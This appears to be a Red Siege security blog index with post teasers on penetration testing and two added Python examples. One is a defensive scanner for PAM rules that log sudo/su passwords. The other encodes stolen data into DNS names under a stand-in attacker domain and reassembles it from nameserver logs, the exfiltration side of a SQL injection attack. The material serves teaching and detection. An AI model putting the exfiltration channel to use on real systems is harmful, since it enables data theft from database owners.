Blog

On Purple

By Tim Medin | July 12, 2019

The “Purple Team” term has been flying around for a while now and it is an important development in our growth as an industry. If you haven’t heard the term […]

Logging Passwords on Linux

By Tim Medin | May 30, 2019

Hal Pomeranz tipped me off to a nasty little trick of using Linux’s own auditing features and PAM to grab clear text passwords from users as they use sudo/su on […]
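
The defensive counterpart to the trick teased above, as an added example that is not code from the post: the assumption here is that the mechanism involved is PAM's pam_tty_audit module with its log_passwd option, which makes auditd record every keystroke of the audited session (passwords included) so that they can later be read back with aureport --tty. The script parses pam.d files the way PAM does (comments, the optional leading "-", bracketed control fields) and flags any active session rule that loads pam_tty_audit.so with log_passwd. The sample pam.d files are constructed for the demo.

```python
"""Detect PAM configurations that record passwords typed at su/sudo prompts.

Added example, not code from the Red Siege post. Assumption: the trick relies
on pam_tty_audit's log_passwd option, which makes auditd keep keystrokes for
the audited session (readable with aureport --tty). The pam.d fragments below
are constructed for the demo.
"""
import pathlib
import tempfile

# Constructed sample /etc/pam.d fragments: one backdoored, two benign.
SAMPLE_PAM_FILES = {
    "sudo": (
        "#%PAM-1.0\n"
        "auth       include      system-auth\n"
        "session    required     pam_tty_audit.so enable=* log_passwd\n"
    ),
    "su": (
        "# session    required     pam_tty_audit.so enable=* log_passwd\n"
        "session    [success=1 default=ignore] pam_tty_audit.so enable=root\n"
    ),
    "login": "-session  optional  pam_tty_audit.so disable=*\n",
}


def parse_pam_line(line: str):
    """Split one pam.d line into (type, control, module, args); None if not a rule.

    Handles '#' comments, the optional leading '-' on the type, and bracketed
    control fields such as [success=1 default=ignore] that contain spaces.
    """
    body = line.split("#", 1)[0].strip()
    if not body:
        return None
    fields = body.split()
    if len(fields) < 3:
        return None
    mtype = fields[0].lstrip("-")
    if fields[1].startswith("["):
        # Bracketed control: join tokens up to the one ending in ']'
        end = next((i for i, f in enumerate(fields) if f.endswith("]")), None)
        if end is None or end + 1 >= len(fields):
            return None
        control = " ".join(fields[1:end + 1])
        rest = fields[end + 1:]
    else:
        control = fields[1]
        rest = fields[2:]
    return mtype, control, rest[0], rest[1:]


def find_password_logging(pam_dir) -> list:
    """Return (file, line_no, rule) for active pam_tty_audit session rules with log_passwd."""
    hits = []
    for path in sorted(pathlib.Path(pam_dir).iterdir()):
        if not path.is_file():
            continue
        for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            parsed = parse_pam_line(line)
            if parsed is None:
                continue
            mtype, _control, module, args = parsed
            if (mtype == "session" and module.endswith("pam_tty_audit.so")
                    and "log_passwd" in args):
                hits.append((path.name, n, line.strip()))
    return hits


def build_sample_pam_dir() -> str:
    """Write the constructed sample files to a temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="pam.d-")
    for name, content in SAMPLE_PAM_FILES.items():
        pathlib.Path(d, name).write_text(content)
    return d


if __name__ == "__main__":
    for f, n, rule in find_password_logging(build_sample_pam_dir()):
        print(f"{f}:{n}: {rule}")
```

Run it against the real directory with `find_password_logging("/etc/pam.d")`; a hit in sudo, su or a stack they include (system-auth, common-session) deserves the same attention as any other persistence mechanism, and the keystroke records themselves live in the audit log, so check who can read it.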

Red Siege Welcomes Corey Overstreet

By Red Siege | May 23, 2019

Overstreet is an experienced penetration tester and red team operator and has been engaged with Fortune 500 organizations across a variety of industries, including financial services, government services, and healthcare. […]

Breaking into Infosec

By Mike Saunders | May 7, 2019

tl/dr; There are a lot of ways to get into infosec. I’ll try to outline some of the things that have helped me along the way and provide some resources […]

Finding the silver lining in getting your teeth kicked in

By Mike Saunders | March 27, 2019

Lots of pen test and red team blogs follow the same model: we came, we saw, we conquered, blue team tears flowed. This is not one of those blogs. TL/DR; […]

SQLi Data Exfiltration via DNS

By Mike Saunders | November 30, 2018

Did you know you can use DNS queries to exfiltrate data from a database via SQLi? No? Then continue reading! I’ll walk through some techniques you can use to enumerate […]
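
The channel teased above, as an added example that is not code from the post: it assumes the injected query makes the database server resolve names of the form `<seq>.<hex chunk>.<attacker domain>` (for instance by handing it a UNC path on that host), and that the attacker runs the authoritative nameserver for the domain and can read its query log. The encoder shows the sender-side constraints (63-octet labels, 253-octet names); the decoder rebuilds the data from log lines, coping with duplicate queries from resolver retries and out-of-order arrival. The query log lines are constructed for the demo.

```python
"""Encode data into DNS names and reassemble it from a nameserver query log.

Added example, not code from the Red Siege post. Assumptions: the database
server can be made (via SQL injection) to look up <seq>.<hex>.<domain>, and
the attacker controls the authoritative server for <domain> and its log.
"""
import binascii
import re

MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical limit for a textual domain name

# Constructed BIND-style query log: one duplicate (resolver retry), one
# unrelated query, and chunks arriving out of order.
SAMPLE_QUERY_LOG = [
    "30-Nov-2018 10:00:01.101 client 203.0.113.5#53211: query: 1.6f2c2077.exfil.example.com IN A +",
    "30-Nov-2018 10:00:01.104 client 203.0.113.5#53211: query: 0.48656c6c.exfil.example.com IN A +",
    "30-Nov-2018 10:00:01.108 client 203.0.113.9#40100: query: 0.48656c6c.exfil.example.com IN A +",
    "30-Nov-2018 10:00:02.300 client 203.0.113.5#53211: query: www.example.com IN A +",
    "30-Nov-2018 10:00:02.311 client 203.0.113.5#53211: query: 2.6f726c64.exfil.example.com IN A +",
]


def encode_chunks(data: bytes, domain: str, chunk_bytes: int = 30) -> list:
    """Hex-encode data and split it into names of the form <seq>.<hex>.<domain>."""
    per_label = chunk_bytes * 2  # two hex chars per byte
    if per_label > MAX_LABEL:
        raise ValueError("hex chunk would exceed the 63-octet label limit")
    hexed = binascii.hexlify(data).decode("ascii")
    names = []
    for seq, i in enumerate(range(0, len(hexed), per_label)):
        name = f"{seq}.{hexed[i:i + per_label]}.{domain}"
        if len(name) > MAX_NAME:
            raise ValueError("name exceeds the 253-octet limit")
        names.append(name)
    return names


def decode_queries(log_lines, domain: str) -> bytes:
    """Pull <seq>.<hex>.<domain> names out of log lines, dedupe, order and unhex.

    Raises ValueError when a sequence number is missing, so a partial capture
    is never silently reported as complete data.
    """
    pat = re.compile(r"\b(\d+)\.([0-9a-f]+)\." + re.escape(domain) + r"\b", re.I)
    chunks = {}
    for line in log_lines:
        m = pat.search(line)
        if not m:
            continue
        seq, hexchunk = int(m.group(1)), m.group(2).lower()
        if len(hexchunk) % 2:
            continue  # truncated or damaged label, ignore it
        chunks.setdefault(seq, hexchunk)  # first sighting wins; retries are dropped
    if not chunks:
        return b""
    missing = [s for s in range(max(chunks) + 1) if s not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return b"".join(binascii.unhexlify(chunks[s]) for s in sorted(chunks))


if __name__ == "__main__":
    for name in encode_chunks(b"Hello, world", "exfil.example.com", chunk_bytes=4):
        print(name)
    print(decode_queries(SAMPLE_QUERY_LOG, "exfil.example.com"))
```

On the defensive side the same parser, pointed at your own resolver logs, is a cheap detector: long hex-only labels with a counter in front of them under a domain nobody in the organisation should be talking to are worth an alert on their own.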

DerbyCon 8 – Web App 101: Getting the Lay of the Land

By Red Siege | October 5, 2018

Mike Saunders will be presenting “Web App 101: Lay of the Land” at DerbyCon 8, Saturday, October 6 at 12:00 PM, in Track 2 (upstairs). Mike draws on his experience […]

Maintaining Session States in .NET Apps With Burp

By Mike Saunders | September 21, 2018

During a recent web app test, I encountered a situation where I would be randomly logged out of the application when running sqlmap. I wasn’t manipulating any of the session […]

Capturing SQL Server User Hash with SQLi

By Mike Saunders | September 5, 2018

On a recent external web app pen test, I found a possible SQL injection vulnerability using the Burp Scanner. One of the tests triggered an A record lookup for the […]

Getting a Handle on Large Parameter Sets

By Mike Saunders | July 19, 2018

During a recent web app engagement, I wanted to run some of the Burp Scanner automated checks, but I was confronted with several issues. First, this particular application did not […]
